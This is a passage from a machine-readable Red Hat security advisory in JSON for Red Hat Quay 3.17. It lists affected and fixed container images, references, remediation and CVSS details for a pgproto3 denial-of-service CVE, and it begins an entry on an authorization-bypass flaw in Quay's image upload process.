          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "RHBZ#2451847",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451847"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32286",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32286",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "https://github.com/golang/vulndb/issues/4518",
          "url": "https://github.com/golang/vulndb/issues/4518"
        },
        {
          "category": "external",
          "summary": "https://github.com/jackc/pgx/issues/2507",
          "url": "https://github.com/jackc/pgx/issues/2507"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4518",
          "url": "https://pkg.go.dev/vuln/GO-2026-4518"
        }
      ],
      "release_date": "2026-03-26T19:40:51.974000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "github.com/jackc/pgproto3/v2: github.com/jackc/pgproto3/v2: Denial of Service via malicious PostgreSQL server"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32589",
      "cwe": {
        "id": "CWE-639",
        "name": "Authorization Bypass Through User-Controlled Key"
      },
      "discovery_date": "2026-03-12T14:43:07.878000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446963"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user\u0027s in-progress image upload.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: quay: insecure direct object reference in BlobUpload",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials to the Quay registry. Unauthenticated users cannot exploit this flaw.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
